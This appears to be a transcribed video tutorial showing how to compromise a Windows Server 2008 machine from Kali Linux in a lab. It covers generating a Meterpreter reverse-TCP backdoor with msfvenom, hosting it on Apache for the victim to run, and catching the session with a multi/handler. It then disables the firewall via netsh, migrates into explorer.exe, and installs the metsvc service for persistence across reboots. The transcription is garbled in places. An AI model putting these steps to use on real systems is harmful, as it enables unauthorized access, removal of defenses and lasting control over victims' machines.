bypassing Windows firewall and maintain persistent connection with a victim. Here I have two machines, Windows Server 2008 and Kali Linux. Let me check IP address of Windows Server 2008. Windows Server 2008 has IP address .144. And Kali Linux has .129. Let me check firewall status of the Windows Server 2008. Firewall is working fine. It is already on. Now let me ping to the 144. Firewall is blocking to ping. Okay. Now let me maximize terminal of the Kali Linux. Let me stop service of PostgreSQL stop. Also let me stop service of metasploitable if it is running. It's not working. Now type msf ve gnome p windows meter preter reverse tcp define localhost IP address of the Kali Linux, and we already discussed Kali Linux IP address. It has IP address 129. So type 129 and define local port 5566. Where do we want to generate this file? Let me delete local port. Now check backdoor.exe is generated or not. It is generated. Now let me create one folder where www share, give permission to the where www share folder. Permission will be 755. You can check permission of the share folder. We assigned it at execute to the user, read execute to the group, and read execute to the other. Now define ownership Now you can check ownership has been changed. Now let me start Apache 2, and now need to copy backdoor.exe to the var www share folder. Now let me go to the Apache 2, delete HTML path, restart the Apache service, open another terminal, run msf console. Use exploit multi handler, run set payload command, Windows, it is searching. After pressing tab, there is a lots of options available. Start with the METE, reverse TCP, set localhost IP address. Localhost IP address is 129. So options, you can see we set 192.168.159.129 as localhost. Now we just need to run exploit and reverse TCP handler has been started. Now just go to the Windows 2008 machine and access 192.168.159.129./share folder. Here you can see we can access backdoor.exe. Just click on it and just click on run. Here you can see session has been established to the remote machine, and now let me check session with the session space -I command. Here is the session number represented. It is IP address of the Windows machine and users informations. It is IP address of the Kali Linux, port number information of the Kali Linux, and this is information of the Windows server's IP address and port number of it. Now let me interact with session number 1, and now we just need to run execute -f cmd.exe capital H. It will try to access remote cell, and we did successfully. Now let me take control over this cell. Here you can see I have a cell of the remote machine. Now let me check firewall status of the remote machine. There is something mistake, I think. No, it is working fine. Here you can see operational mode is enabled, exceptional mode is enabled, and it is working. Here you can see status of the firewall. It is green already. Now let me disable it using netsh command. Netsh firewall set op mode is equal to disable. It's okay. Now go to the Windows Server 2008, and here you can see it is off. Now let me exit from this cell and take control over the system. System has been got. Let me check process information of the remote machine. Let me check explorer.exe's process number. Process number is 1548. Is the process number of explorer.exe. However, let me check. Here you can see PID informations available, so it is correct. So explorer.exe has 1548. So let me migrate 1548. It is migrated successfully, and we have control over the explorer.exe. And now let me run mat svc service. And it is uploading a starting service, and service mat svc successfully installed over the remote machine. So mat svc help in maintaining a persistent connection with victim machine even when the machine is rebooted or has lost connection with it. You can establish the connection with the machine without the need of the target user and without the need of the user running a backdoor executable again and again. So now we just need to restart the Windows 8 machine, and let me check it is working or not. It is restarted. Use Ctrl plus Z from exit from MSF console. Now we need to run MSF console again. Windows Server 2008 has been restarted. MSF console has been loaded successfully. Run use exploit multi handler, set payload Windows mat svc bind tcp, set local port 31337, set localhost IP address and localhost as IP address 192.168.159.129. Now type remote host IP address and remote host as IP address 192.168.159.144. Go to the Windows Server 2008, open command prompt and type ipconfig to check IP address of the Windows Server 2008. It has 144 IP address. And now just run exploit command to establish connection with the mat svc service that I have already executed. Here you can see mat svc service is running on task manager. You can go to the services also. So it is establishing connection with the Kali Linux.